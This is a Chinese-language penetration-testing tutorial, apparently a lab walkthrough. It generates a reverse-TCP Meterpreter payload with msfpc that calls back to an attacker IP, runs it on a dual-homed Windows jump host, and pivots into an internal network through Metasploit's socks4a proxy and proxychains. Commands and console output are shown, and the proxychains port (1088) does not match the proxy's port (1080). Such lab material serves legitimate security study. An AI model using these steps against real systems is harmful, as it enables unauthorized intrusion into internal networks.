proxychains代理内部服务器所有流量
0x01 TD;LR
在渗透测试的过程中,通过msf拿到了立足点之后,可开始对内网的其他机器进行测试,但内网机器无法连接互联网,可通过设置socks4a代理将内部的流量代理出来,让外部机器可以直接访问内部的机器。
工具
proxychains
msfpc
0x02 实验环境
注意: FILESERVER为内部服务器,WEBSERVER为外部服务器,双网卡,可上网。kali linux:攻击机,ip:192.168.1.129。
连通性测试。
windows 2012 跳板机双网卡
ip1:192.168.1.133
ip2:10.10.10.146
windows 2008 - webserver内网服务器
ip:10.10.10.138
0x03 具体操作1、通过msfpc生成payload,msfpc会生成两个文件,windows-meterpreter-staged-reverse-tcp-7777-exe和windows-meterpreter-staged-reverse-tcp-7777-exe.rc,一个是payload,一个是配置文件,并利用python建立临时服务器。
msfpc msf windows 192.168.1.129 7777
2、访问python建立的服务器,下载exe文件,执行。
3、启动msfcosole
msfconsole -r windows-meterpreter-staged-reverse-tcp-7777-exe.rc
4、执行exe获取,meterpreter。
5、添加路由。
6、设置socks4a服务器。
msf5 exploit(multi/handler) > use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) > show optionsModule options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on.Auxiliary action: Name Description ---- ----------- Proxy msf5 auxiliary(server/socks4a) > set SRVPORT 1080SRVPORT => 1080msf5 auxiliary(server/socks4a) > run[*] Auxiliary module running as background job 1.msf5 auxiliary(server/socks4a) > [*] Starting the socks4a proxy server
7、配置proxychains
kali@kali:~/Desktop$ tail /etc/proxychains.conf ## proxy types: http, socks4, socks5# ( auth types supported: "basic"-http "user/pass"-socks )#[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"# socks4 127.0.0.1 9050socks4 127.0.0.1 1088
8、访问内部服务器应用。
9、设置socks host为127.0.0.1,port为1080,关闭http proxy代理。
10、浏览器访问。